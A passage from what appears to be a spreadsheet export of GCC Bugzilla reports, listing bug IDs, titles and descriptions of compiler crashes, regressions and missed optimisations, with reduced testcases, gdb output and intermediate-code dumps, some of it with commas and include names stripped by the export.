    at /space/rguenther/src/svn/gcc/gcc/fold-const.c:2089
2089          gcc_assert (tree_int_cst_equal (TYPE_SIZE (type) TYPE_SIZE (orig)))
(gdb) call debug_tree(arg)
  constant invariant -1&gt;
(gdb) call debug_tree(type)
 &lt;vector_type 0xb797d730
    type &lt;real_type 0xb7cbd9b4 real8 DF
        size 
        unit size 
        align 64 symtab 0 alias set 4 precision 64
        pointer_to_this &gt;
    V2DF
    size  constant invariant 128&gt;
    unit size  constant invariant 16&gt;
    align 128 symtab 0 alias set -1 nunits 2&gt;
(gdb) up
#2  0x085ec360 in interpret_rhs_modify_expr (loop=0x8a4e110 
    at_stmt=0xb7983798 opnd1=0xb797eb20 type=0xb797d730)
    at /space/rguenther/src/svn/gcc/gcc/tree-scalar-evolution.c:1659
1658          /* TYPE may be integer real or complex so use fold_convert.  */
1659          res = chrec_fold_multiply (type chrec10
1660                                     fold_convert (type integer_minus_one_node))
But we can only build a zero vector in fold_convert.</t>
  </si>
  <si>
    <t>GCC-61065</t>
  </si>
  <si>
    <t>[4.9/4.10 Regresion] invalid args to -fsanitize should be an error not a warning</t>
  </si>
  <si>
    <t>[forwarded from https://bugs.debian.org/745105]
With gcc-4.8 this works because -fsanitize=address works in 4.8:
    &gt; gcc-4.8 -fsanitize=address test.c -o /dev/null
and this fails and exits with non-zero because -fsanitize=integer
is not supported in 4.8:
    &gt; gcc-4.8 -fsanitize=integer test.c -o /dev/null
    gcc-4.8: error: unrecognized command line option â€˜-fsanitize=integerâ€™
    &gt; echo $?
    1
Now for 4.9:
    &gt; gcc-4.9 -fsanitize=integer test.c -o /dev/null
    gcc-4.9: warning: unrecognized argument to -fsanitize= option: â€˜integerâ€™
    cc1: warning: unrecognized argument to -fsanitize= option: â€˜integerâ€™
    &gt; echo $?
    0
This should exit with non-zero so that support for this flag can correctly
be detected in things line autoconf generated configure scripts.</t>
  </si>
  <si>
    <t>GCC-44391</t>
  </si>
  <si>
    <t>[4.6 Regression] gcc.dg/graphite/id-19.c ICEs at -Os (in build2_stat at tree.c:3670)</t>
  </si>
  <si>
    <t>Command line:
$ g++ -fgraphite-identity -m32 -Os id-19.c
Compiler output:
$ /mnt/svn/gcc-trunk/binary-160165-lto-fortran/bin/g++ -fgraphite-identity -m32 -Os id-19.c
id-19.c: In function 'void byte_insert_op1(unsigned char* unsigned char*)':
id-19.c:1:6: internal compiler error: in build2_stat at tree.c:3670
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r160165 - crash
r160122 - crash
r159696 - crash
r158095 - crash
r153685 - OK
4.5 r158978 - OK
Reduced testcase (not much different from gcc.dg/graphite/id-19.c)
------------------------------
void byte_insert_op1 (unsigned char *loc unsigned char *end unsigned *pto)
{
  while (end != loc)
    *pto = *--end
}
------------------------------</t>
  </si>
  <si>
    <t>GCC-24139</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Rejects definition of member of specialized inner class</t>
  </si>
  <si>
    <t>We have code that works with g++ 3.2.3 (i386-redhat-linux) that no longer works
on 4.
#include 
using namespace std
template
class Hide {
 public:
  Hide() {
	a=new Hidden()
  }
  class Hidden
private:
  Hidden *a
}
template
class Hide::Hidden
{
 public:
  Hidden()
}
template
Hide::Hidden::Hidden() {
  cout Hidden &lt;&lt; endl
}
int main(int argcchar *argv[])
{
  Hide b
}
I get the error:
   error: template-id â€˜Hiddenâ€™ for â€˜Hide::Hidden::Hidden()â€™ does not
match any template declaration
However if I remove the Hidden constructor from the code  I get the error:
   undefined reference to `Hide::Hidden::Hidden()
I am confused by the Hidden in the first example and think that the
undefined reference error is correct.</t>
  </si>
  <si>
    <t>mspencer</t>
  </si>
  <si>
    <t>GCC-80888</t>
  </si>
  <si>
    <t>Wide_Text_IO defaults to bracket encoding even if -gnatW8 specified</t>
  </si>
  <si>
    <t>The GNAT reference manual says in 11.6 Wide_Text_IO
   The default encoding method for the standard files and for opened
   files for which no WCEM parameter is given in the FORM string matches
   the wide character encoding specified for the main program (the
   default being brackets encoding if no coding method was specified with
   -gnatW).
This is slightly wrong in that the UTF-8 coding method is selected
even in the absence of -gnatW8 if the main program's source file has
the appropriate BOM but the point of this PR is that it is not in
fact true and even if -gnatW8 is given files are created/opened with
bracket encoding unless the Form parameter is given (Form =&gt; wcem=8).
The attached demonstrator shows this. The file as uploaded begins with
EF BB BF but compile with -gnatW8 to be sure:
$ gnatmake utf8_encoding -gnatW8
gcc -c -gnatW8 utf8_encoding.adb
gnatbind -x utf8_encoding.ali
gnatlink utf8_encoding.ali
$ ./utf8_encoding 
Two files are created one without the Form parameter:
   $ od -tx1 -c -N32 file_without_form 
   0000000    5b  22  30  33  43  30  22  5d  72  b2  68  0a                
              [      0   3   C   0      ]   r 262   h  \n                
   0000014
and one with:
   $ od -tx1 -c -N32 file_with_form 
   0000000    cf  80  72  c2  b2  68  0a                                    
              Ï€  **   r   Â²  **   h  \n                                    
   0000007</t>
  </si>
  <si>
    <t>GCC-48130</t>
  </si>
  <si>
    <t>[4.7 Regression]: build fails on libsupc++/nested_exception.cc</t>
  </si>
  <si>
    <t>With revision 170968 the tree built (testresults show 1 regression).
From revision 170978 and on build has failed as follows:
libtool: compile:  /tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc/xgcc -shared-libgcc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/./gcc -nostdinc++ -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/src -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/src/.libs -nostdinc -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/ -isystem /tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/newlib/targ-include -isystem /tmp/hpautotest-gcc1/gcc/newlib/libc/include -B/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/cris -L/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libgloss/libnosys -L/tmp/hpautotest-gcc1/gcc/libgloss/cris -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/bin/ -B/tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/lib/ -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/include -isystem /tmp/hpautotest-gcc1/cris-elf/pre/cris-elf/sys-include -I/tmp/hpautotest-gcc1/gcc/libstdc++-v3/../gcc -I/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include/cris-elf -I/tmp/hpautotest-gcc1/cris-elf/gccobj/cris-elf/libstdc++-v3/include -I/tmp/hpautotest-gcc1/gcc/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -std=gnu++0x -c /tmp/hpautotest-gcc1/gcc/libstdc++-v3/libsupc++/nested_exception.cc -o nested_exception.o
/tmp/hpautotest-gcc1/gcc/libstdc++-v3/libsupc++/nested_exception.cc:28:3: error: 'nested_exception' does not name a type
make[4]: *** [nested_exception.lo] Error 1
Author of suspect patch CC:ed.
Note: cris-elf is a newlib-target this error should be apparent for any *-elf or similar target.</t>
  </si>
  <si>
    <t>GCC-9617</t>
  </si>
  <si>
    <t>[ia64] bad code generated for __builtin_ia64_bsp()</t>
  </si>
  <si>
    <t>GCC appears to generate bad code when __builtin_ia64_bsp()
gets predicated.  When compiling the attached test program
with gcc v3.2 for example the assembler will generate the
following error message:
$ gcc-3.2 -O /tmp/t.c 
/tmp/ccfZBgfD.s: Assembler messages:
/tmp/ccfZBgfD.s:23: Error: qualifying predicate not followed by instruction
The problem is due to the fact that GCC emitted a line
containing only a predicate and a stop bit:
(p6)    
which isn't valid code.
Release:
gcc-3.2 (seems to affect all gcc/ia64 versions that support __builtin_ia64_bsp())
Environment:
ia64 linux
How-To-Repeat:
Just compile the attached program with gcc -O:
  $ gcc -O t.c
  /tmp/cc41L7v8.s: Assembler messages:
  /tmp/cc41L7v8.s:20: Error: qualifying predicate not followed by instruction
The problem exists with 2.96 3.2 and pre3.4 (as of Jan 10th 2003).</t>
  </si>
  <si>
    <t>GCC-45271</t>
  </si>
  <si>
    <t>[OOP] Polymorphic code breaks when changing order of USE statements</t>
  </si>
  <si>
    <t>Hi
the attached code fails at runtime as follows:
% ./a.out
 calling cg...
 cg: before g%assign
 Oops in concrete_vector::my_assign : wrong type
Interchanging the indicated use statements in the main
program leads to:
% ./a.out
 calling cg...
 cg: before g%assign
 cg: after  g%assign
 after cg...
The code works flawlessly with nagfor 5.2
xlf 12.1 and xlf 13.1.
Cheers
ha</t>
  </si>
  <si>
    <t>GCC-78369</t>
  </si>
  <si>
    <t>[7 Regression] default parameter ICEs</t>
  </si>
  <si>
    <t>The following short program ICEs in c++ '7.0.0 20161106' (ICE goes away if we eliminate the default-initialized parameter):
#include 
#include 
inline void f(struct tm time_tm = {})
{}
int main()
{
    f()
    return 0
}</t>
  </si>
  <si>
    <t>guille</t>
  </si>
  <si>
    <t>GCC-44718</t>
  </si>
  <si>
    <t>Procedure-pointer name is wrongly regarded as external procedure</t>
  </si>
  <si>
    <t>Reported by John McFarland at http://gcc.gnu.org/ml/fortran/2010-06/msg00286.html
If one uses
  procedure() pointer :: f
at multiple scopes of the same program gfortran treats the proc-pointer name (f) as external name - and thus rejects using it once as function and once as subroutine name:
Error: Global name 'f' at (1) is already being used as a SUBROUTINE at (2)
Test case by John McFarland:
MODULE m
  IMPLICIT NONE
CONTAINS
  FUNCTION func(x) RESULT(y)
    INTEGER :: xy
    y = x *2
  END FUNCTION func
  SUBROUTINE sub(x)
    INTEGER :: x
    PRINT* x
  END SUBROUTINE sub
  SUBROUTINE use_func()
    PROCEDURE(func) POINTER :: f
    INTEGER :: y
    f =&gt; func
    y = f(2)
  END SUBROUTINE use_func
  SUBROUTINE use_sub()
    PROCEDURE(sub) POINTER :: f
    f =&gt; sub
    CALL f(2)
  END SUBROUTINE use_sub
END MODULE m</t>
  </si>
  <si>
    <t>GCC-17283</t>
  </si>
  <si>
    <t>UNPACK issues</t>
  </si>
  <si>
    <t>$ cat bug1.f90/irun/bin/gfortran -v bug1.f90  ./a.exe
program bug1
  integer*4 dimension(10) :: numbers = (/(ii=110)/)
  print * pack( numbers  MASK = ( numbers &gt;= 5 ) )
end program bug1
Driving: /irun/bin/gfortran -v bug1.f90 -lgfortranbegin -lgfortran
Reading specs from /irun/lib/gcc/i686-pc-cygwin/3.5.0/specs
Configured with: ../gcc-3.5-20040815/configure --with-gmp=/gmp --with-mpfr=/gmp
--prefix=/irun --enable-languages=cc++f95
Thread model: single
gcc version 3.5.0 20040815 (experimental)
 /irun/libexec/gcc/i686-pc-cygwin/3.5.0/f951.exe bug1.f90 -quiet -dumpbase bug1.
f90 -mtune=pentiumpro -auxbase bug1 -version -o /cygdrive/c/DOCUME~1/THOMASP/LOC
ALS~1/Temp/ccQbS1Rh.s
GNU F95 version 3.5.0 20040815 (experimental) (i686-pc-cygwin)
        compiled by GNU C version 3.5.0 20040719 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
 as -o /cygdrive/c/DOCUME~1/THOMASP/LOCALS~1/Temp/ccu4nxCt.o /cygdrive/c/DOCUME~
1/THOMASP/LOCALS~1/Temp/ccQbS1Rh.s
 /irun/libexec/gcc/i686-pc-cygwin/3.5.0/collect2.exe -Bdynamic --dll-search-pref
ix=cyg /lib/crt0.o -L/irun/lib/gcc/i686-pc-cygwin/3.5.0 -L/irun/lib/gcc/i686-pc-
cygwin/3.5.0/../../.. /cygdrive/c/DOCUME~1/THOMASP/LOCALS~1/Temp/ccu4nxCt.o -lgf
ortranbegin -lgfortran -lgcc -lcygwin -luser32 -lkernel32 -ladvapi32 -lshell32 -
lgcc
Segmentation fault (core dumped)
Compiles and runs fine with F Portland f90 and Compaq/Digital f90</t>
  </si>
  <si>
    <t>GCC-26317</t>
  </si>
  <si>
    <t>Accessing array embedded in a record with representation clause</t>
  </si>
  <si>
    <t>Bellow is the source code command line and error report which I have come accross. Tester is a nonsense package to demonstrate the problem it appears only to fail when reading the array value but when assigning to the array it works fine. 
I have also seen this failure in version 3.4.2 (GNAT release) which is considerably older. 
-- command line instructions and error report 
$ gcc -c tester.adb
+===========================GNAT BUG DETECTED==============================+
| 4.0.2 (i686-pc-cygwin) in expand_expr_addr_expr_1 at expr.c:6222        |
| Error detected at tester.adb:17:21                                       |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
tester.adb
tester.ads
compilation abandoned
-- tester.ads 
package tester is 
	-- declare a small array 
    subtype small_string_type is String (1 .. 3)           
    -- which becomes the componenet of a record 
    type some_string is                                     
        record                                              
            Trigram : small_string_type                    
        end record                                         
	-- add representation clause        
    for some_string use                                     
        record                                              
            Trigram at 0 range 20 .. 43                    
        end record                                         
	-- and define a constant                                                            
		Null_Trigram : constant small_string_type :=            
	-- obviously this code is a nonesense
	procedure scratch( some_string_instance : some_string )
end tester
-- tester.adb
package body tester is 
	-- obviously this code is a nones
	procedure scratch( some_string_instance : some_string ) is
		Valid : Boolean                                           
		begin                                                      
	    if some_string_instance.Trigram /= Null_Trigram then --     
			Valid := true                                           
		end if  
		end scratch                                                 
end tester                                               
-- gcc version information 
Using built-in specs.
Target: i686-pc-cygwin
Configured with: ../gcc-4.0.2/configure --enable-languages=ada --disable-win32-registry
Thread model: single
gcc version 4.0.2</t>
  </si>
  <si>
    <t>ben.midgley</t>
  </si>
  <si>
    <t>GCC-18147</t>
  </si>
  <si>
    <t>Objects in instance initializer blocks are scoped too widely</t>
  </si>
  <si>
    <t>If you declare an object within an instance initializer you cannot declare
another object of the same name in a different instance initializer.
This description seems pretty opaque so an example of correct code that GCJ
rejects is probably better:
-- init.java --
import java.util.HashMap
class init
{
  private final HashMap _map1 = new HashMap()
  {
    Object foo = new Object()
    _map1.put (foo! foo)
  }
  private final HashMap _map2 = new HashMap()
  {
    Object foo = new Object()
    _map2.put (bar! foo)
  }
}
-- init.java --
GCJ exits with this error:
init.java:13: error: Variable `foo' is already defined in this method and was
declared `Object foo' at line 7.
       Object foo = new Object()
              ^
1 error</t>
  </si>
  <si>
    <t>GCC-36117</t>
  </si>
  <si>
    <t>Use MPFR for bessel function (optimization rejects valid F2008)</t>
  </si>
  <si>
    <t>Currently the Bessel function are not simplified even though MPFR supports this (since 2.3.0) via
â€” Function: int mpfr_j0 (mpfr_t rop mpfr_t op mp_rnd_t rnd)
â€” Function: int mpfr_j1 (mpfr_t rop mpfr_t op mp_rnd_t rnd)
â€” Function: int mpfr_jn (mpfr_t rop long n mpfr_t op mp_rnd_t rnd)
â€” Function: int mpfr_y0 (mpfr_t rop mpfr_t op mp_rnd_t rnd)
â€” Function: int mpfr_y1 (mpfr_t rop mpfr_t op mp_rnd_t rnd)
â€” Function: int mpfr_yn (mpfr_t rop long n mpfr_t op mp_rnd_t rnd)
(One should use: #if MPFR_VERSION &gt;= MPFR_VERSION_NUM(230) )
------------------
Found at:
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/97eec25eef27e9fb
See especially these two posts by James Van Buskirk:
http://groups.google.com/group/comp.lang.fortran/msg/44e373c15a051393
http://groups.google.com/group/comp.lang.fortran/msg/a732fb2849020fe3
The following program works if one replaces BESJ0 by ERF or ACOSH.
Error: 'kind' argument of 'cmplx' intrinsic at (1) must be a constant
After fixing the example please check that also the long examples work.
program bug3
   implicit none
   real parameter :: Qarg1 = 1.7
   integer parameter :: k2 = kind(BESJ0(Qarg1))
   integer parameter :: is_int = 1-1/(2+0*BESJ0(Qarg1))*2
   integer parameter :: kind_if_real = &amp;
      (1-is_int)*k2+is_int*kind(1.0)
   complex :: z = cmplx(01kind_if_real) ! FAILS
   print * kind_if_real  ! WORKS prints 4 (and dump is OK)
end program bug3</t>
  </si>
  <si>
    <t>GCC-24309</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] ICE with -O3 -ftree-loop-linear</t>
  </si>
  <si>
    <t>The example (attached below) when compiled by following gcc
-------------------
$ gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../../../gcc-CVS-20051011/gcc-CVS-20051011/configure --host=i686-pc-linux-gnu --prefix=/usr/local/opt/gcc-4.1 --exec-prefix=/usr/local/opt/gcc-4.1 --sysconfdir=/etc --libdir=/usr/local/opt/gcc-4.1/lib --libexecdir=/usr/local/opt/gcc-4.1/libexec --sharedstatedir=/var --localstatedir=/var --program-suffix=-4.1 --with-x-includes=/usr/X11R6/include --with-x-libraries=/usr/X11R6/lib --enable-shared --enable-static --with-gnu-as --with-gnu-ld --with-stabs --enable-threads=posix --enable-version-specific-runtime-libs --disable-coverage --disable-libgcj --disable-checking --enable-multilib --with-x --enable-cmath --enable-libstdcxx-debug --enable-fast-character --enable-hash-synchronization --with-system-zlib --with-libbanshee --with-demangler-in-ld --with-arch=athlon-xp --disable-libada --enable-languages=cc++f95objc
Thread model: posix
gcc version 4.1.0 20051010 (experimental)
-------------------
with
-------------------
gcc -O3 -ftree-loop-linear -c quant_lsp.c -o quant_lsp.o
-------------------
results in this:
-------------------
quant_lsp.c: In function â€˜lsp_quant_48kâ€™:
quant_lsp.c:103: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
-------------------
This fails on both i686-pc-linux-gnu and x86_64-pc-linux-gnu. It seems that the regression was introduced somewhere between CVS-20050723 (which works) and CVS-20050812 (which doesn't).</t>
  </si>
  <si>
    <t>GCC-12117</t>
  </si>
  <si>
    <t>[3.4 regression] treelang build failure</t>
  </si>
  <si>
    <t>[missing a treelang component in Bugzilla ...]
CVS HEAD 20030831
stage1/xgcc -Bstage1/ -B/usr/lib/gcc-snapshot/i486-linux/bin/ -c   -O2  -DIN_GCC
  -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic
-Wno-long-long -Wmissing-prototypes -Wmissing-declarations -Werror -fno-common 
 -DHAVE_CONFIG_H    -I. -Itreelang -I../../src/gcc -I../../src/gcc/treelang
-I../../src/gcc/../include  ../../src/gcc/treelang/treetree.c -o treelang/treetree.o
../../src/gcc/treelang/treetree.c:179: warning: ISO C forbids initialization
between function pointer and `void *'
make[4]: *** [treelang/treetree.o] Error 1</t>
  </si>
  <si>
    <t>GCC-51608</t>
  </si>
  <si>
    <t>[4.7 Regression][C++11] Unordered containers end(size_type) isn't constant time</t>
  </si>
  <si>
    <t>An internal reminder. The issue must be fixed in time for the release.</t>
  </si>
  <si>
    <t>GCC-26344</t>
  </si>
  <si>
    <t>[4.2 Regression] three testsuite failures in gcc.dg/tree-ssa/</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/20030730-1.c scan-tree-dump-times if  0
FAIL: gcc.dg/tree-ssa/20030730-2.c scan-tree-dump-times if  0
FAIL: gcc.dg/tree-ssa/20030807-2.c scan-tree-dump-times if  0
Looking at them they look only to be problems in the testcases and not actually missed optimizations.
Also happens on powerp-aix:
http://gcc.gnu.org/ml/gcc-testresults/2006-02/msg00885.html</t>
  </si>
  <si>
    <t>GCC-83232</t>
  </si>
  <si>
    <t>fma3d spec2000 regression on zen with -Ofast (generic tuning) after r255268 by missed SLP oppurtunity</t>
  </si>
  <si>
    <t>r255268 introduced regression on fma3d. This difference pays back in specfp2000 in general but should be tracked (and hopefully fixed).
Compiling with -fdisable-tree-cunroll makes the problem go away. Problem is that slp vectorizer is confused by presence of unrolled vectorized loop body and gives up on vectorizing initialization sequence which leads to memory mismatch stall.
Problem is in material_11.f90 where the loop of material_41_integration is vectorized in both cases. New code omits vectorization for alignment but it also introduces partial stores followed by full sized load:
  _13 = *stress_203(D)[0]
  sinc[0] = _13
  _336 = *stress_203(D)[1]
  sinc[1] = _336
  _343 = *stress_203(D)[2]
  sinc[2] = _343
  _350 = *stress_203(D)[3]
  sinc[3] = _350
  _22 = *dtnext_206(D)
  _23 = *dxx_207(D)
  _24 = _22 * _23
  einc[0] = _24
  _25 = *dyy_209(D)
  _26 = _22 * _25
  einc[1] = _26
  _27 = *dzz_211(D)
  _28 = _22 * _27
  einc[2] = _28
  _29 = *dxy_213(D)
  _30 = _22 * _29
  einc[3] = _30
  _31 = *dxz_215(D)
  _32 = _22 * _31
  einc[4] = _32
  _33 = *dyz_217(D)
  _34 = _22 * _33
  einc[5] = _34
  vect_cst__471 = {p3_194 p3_194}
  vect__37.58_227 = MEM[(real(kind=8) *)stress_203(D)]
  vect__38.61_323 = MEM[(real(kind=8) *)
  vect__39.62_444 = vect__38.61_323 * vect_cst__471
  vect__40.63_443 = vect__37.58_227 + vect__39.62_444
  MEM[(real(kind=8) *)stress_203(D)] = vect__40.63_443
  vect__37.58_432 = MEM[(real(kind=8) *)stress_203(D) + 16B]
  vect__38.61_431 = MEM[(real(kind=8) *)
  vect__39.62_430 = vect__38.61_431 * vect_cst__471
  vect__40.63_429 = vect__39.62_430 + vect__37.58_432
  MEM[(real(kind=8) *)stress_203(D) + 16B] = vect__40.63_429
  vect__37.58_475 = MEM[(real(kind=8) *)stress_203(D) + 32B]
  vect__38.61_472 = MEM[(real(kind=8) *)
  vect__39.62_463 = vect_cst__471 * vect__38.61_472
  vect__40.63_462 = vect__39.62_463 + vect__37.58_475
  MEM[(real(kind=8) *)stress_203(D) + 32B] = vect__40.63_462
  _41 = *stress_203(D)[0]
  _342 = _25 + _27
  _44 = _23 + _342
  _8 = _22 * _44
  _45 = _6 * _8
  _46 = _41 + _45
  *stress_203(D)[0] = _46
  _47 = *stress_203(D)[1]
  _48 = _45 + _47
  *stress_203(D)[1] = _48
  *stress_203(D)[2] = 0.0
  einc[4] = 0.0
  einc[5] = 0.0
  if (ak_202 == 0.0)
    goto  [50.00%]
  else
    goto  [50.00%]
while old code did:
  vect__13.78_205 = MEM[(real(kind=8) *)stress_203(D)]
  vect__13.79_445 = MEM[(real(kind=8) *)stress_203(D) + 16B]
  MEM[(real(kind=8) *)
  MEM[(real(kind=8) *)
  _22 = *dtnext_206(D)
  _23 = *dxx_207(D)
  _24 = _22 * _23
  _25 = *dyy_209(D)
  _26 = _22 * _25
  _27 = *dzz_211(D)
  _28 = _22 * _27
  _29 = *dxy_213(D)
  _30 = _22 * _29
  _31 = *dxz_215(D)
  _32 = _22 * _31
  _33 = *dyz_217(D)
  _34 = _22 * _33
  vect_cst__479 = {_32 _34}
  vect_cst__482 = {_28 _30}
  vect_cst__486 = {_24 _26}
  MEM[(real(kind=8) *)
  MEM[(real(kind=8) *)
  MEM[(real(kind=8) *)
  _441 = (unsigned long) stress_203(D)
  _440 = _441 &gt;&gt; 3
  _439 = -_440
  _438 = (unsigned int) _439
  prolog_loop_niters.57_442 = _438 
  if (prolog_loop_niters.57_442 == 0)
    goto  [33.33%]
  else
    goto  [66.67%]
    succ:       3 [66.7% (guessed)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
                4 [33.3% (guessed)]  count:51145904 (estimated locally) (TRUE_VALUEEXECUTABLE)
   basic block 3 loop depth 0 count 102291806 (estimated locally) maybe hot
    prev block 2 next block 4 flags: (NEW REACHABLE VISITED)
    pred:       2 [66.7% (guessed)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
  _471 = MEM[(real(kind=8)[6] *)stress_203(D)]
  _463 = einc[0]
  _462 = p3_194 * _463
  _461 = _462 + _471
  MEM[(real(kind=8)[6] *)stress_203(D)] = _461
    succ:       4 [always]  count:102291806 (estimated locally) (FALLTHRUEXECUTABLE)
   basic block 4 loop depth 0 count 153437710 (estimated locally) maybe hot
    prev block 3 next block 5 flags: (NEW REACHABLE VISITED)
    pred:       3 [always]  count:102291806 (estimated locally) (FALLTHRUEXECUTABLE)
                2 [33.3% (guessed)]  count:51145904 (estimated locally) (TRUE_VALUEEXECUTABLE)
  # i_435 = PHI 
  prolog_loop_adjusted_niters.58_432 = (sizetype) prolog_loop_niters.57_442
  niters.59_431 = 6 - prolog_loop_niters.57_442
  bnd.60_417 = niters.59_431 &gt;&gt; 1
  _410 = prolog_loop_adjusted_niters.58_432 * 8
  vectp_stress.65_411 = stress_203(D) + _410
  vectp_einc.68_406 = 
  vect_cst__401 = {p3_194 p3_194}
  vect__37.66_250 = MEM[(real(kind=8) *)vectp_stress.65_411]
  vect__38.69_477 = MEM[(real(kind=8) *)vectp_einc.68_406]
  vect__39.70_219 = vect_cst__401 * vect__38.69_477
  vect__40.71_227 = vect__39.70_219 + vect__37.66_250
  MEM[(real(kind=8) *)vectp_stress.65_411] = vect__40.71_227
  vect__37.66_382 = MEM[(real(kind=8) *)vectp_stress.65_411 + 16B]
  vect__38.69_381 = MEM[(real(kind=8) *)vectp_einc.68_406 + 16B]
  vect__39.70_380 = vect__38.69_381 * vect_cst__401
  vect__40.71_379 = vect__39.70_380 + vect__37.66_382
  MEM[(real(kind=8) *)vectp_stress.65_411 + 16B] = vect__40.71_379
  if (bnd.60_417 == 2)
    goto  [33.33%]
  else
    goto  [66.67%]
    succ:       6 [33.3% (adjusted)]  count:51145904 (estimated locally) (TRUE_VALUEEXECUTABLE)
                5 [66.7% (adjusted)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
   basic block 5 loop depth 0 count 68194539 (estimated locally) maybe hot
   Invalid sum of incoming counts 102291806 (estimated locally) should be 68194539 (estimated locally)
    prev block 4 next block 6 flags: (NEW REACHABLE VISITED)
    pred:       4 [66.7% (adjusted)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
  vect__37.66_407 = MEM[(real(kind=8) *)vectp_stress.65_411 + 32B]
  vect__38.69_402 = MEM[(real(kind=8) *)vectp_einc.68_406 + 32B]
  vect__39.70_400 = vect_cst__401 * vect__38.69_402
  vect__40.71_399 = vect__39.70_400 + vect__37.66_407
  MEM[(real(kind=8) *)vectp_stress.65_411 + 32B] = vect__40.71_399
    succ:       6 [always (adjusted)]  count:68194539 (estimated locally) (FALLTHRUEXECUTABLE)
   basic block 6 loop depth 0 count 153437710 (estimated locally) maybe hot
   Invalid sum of incoming counts 119340443 (estimated locally) should be 153437710 (estimated locally)
    prev block 5 next block 7 flags: (NEW VISITED)
    pred:       5 [always (adjusted)]  count:68194539 (estimated locally) (FALLTHRUEXECUTABLE)
                4 [33.3% (adjusted)]  count:51145904 (estimated locally) (TRUE_VALUEEXECUTABLE)
  niters_vector_mult_vf.61_416 = niters.59_431 
  _414 = (integer(kind=4)) niters_vector_mult_vf.61_416
  tmp.62_415 = _414 + i_435
  if (niters_vector_mult_vf.61_416 == niters.59_431)
    goto  [33.33%]
  else
    goto  [66.67%]
    succ:       7 [66.7% (guessed)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
                8 [33.3% (guessed)]  count:51145904 (estimated locally) (TRUE_VALUEEXECUTABLE)
   basic block 7 loop depth 0 count 613536076 (estimated locally) maybe hot
   Invalid sum of incoming counts 102291806 (estimated locally) should be 613536076 (estimated locally)
    prev block 6 next block 8 flags: (NEW REACHABLE VISITED)
    pred:       6 [66.7% (guessed)]  count:102291806 (estimated locally) (FALSE_VALUEEXECUTABLE)
...
I would say new code is nicer and should run faster if there was no partial stores.
slp vectorizer has difference when analzing einc:
Relevant difference in SLP vectorizer (old-&gt;new) is:
        offset alignment: 128
        step alignment: 128
        base_object: einc[5]
+Creating dr for MEM[(real(kind=8) *)stress_203(D)]
+analyze_innermost: success.
+       base_address: stress_203(D)
+       offset from base address: 0
+       constant offset from base address: 0
+       step: 0
+       base alignment: 8
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: MEM[(real(kind=8) *)stress_203(D)]
+Creating dr for MEM[(real(kind=8) *)&amp;einc]
+analyze_innermost: success.
+       base_address: &amp;einc
+       offset from base address: 0
+       constant offset from base address: 0
+       step: 0
+       base alignment: 16
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: MEM[(real(kind=8) *)&amp;einc]
....
+Creating dr for MEM[(real(kind=8) *)vectp_einc.59_440]
+analyze_innermost: success.
+       base_address: &amp;einc
+       offset from base address: 0
+       constant offset from base address: 16
+       step: 0
+       base alignment: 16
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: MEM[(real(kind=8) *)vectp_einc.59_440]
+Creating dr for MEM[(real(kind=8) *)vectp_stress.64_439]
+analyze_innermost: success.
+       base_address: stress_203(D)
+       offset from base address: 0
+       constant offset from base address: 16
+       step: 0
+       base alignment: 8
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: MEM[(real(kind=8) *)vectp_stress.64_439]
....
+Creating dr for MEM[(real(kind=8) *)vectp_einc.59_426]
+analyze_innermost: success.
+       base_address: &amp;einc
+       offset from base address: 0
+       constant offset from base address: 32
+       step: 0
+       base alignment: 16
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: MEM[(real(kind=8) *)vectp_einc.59_426]
....
+Creating dr for einc[4]
+analyze_innermost: success.
+       base_address: &amp;einc
+       offset from base address: 0
+       constant offset from base address: 32
+       step: 0
+       base alignment: 16
+       base misalignment: 0
+       offset alignment: 128
+       step alignment: 128
+       base_object: einc[4]
+Creating dr for einc[5]
+analyze_innermost: success.
+       base_address: &amp;einc
+       offset from base address: 0
+       constant offset from base address: 40
+       step: 0
+       base alignment: 16
+       base misalignment: 0
+       offset alignment: 128
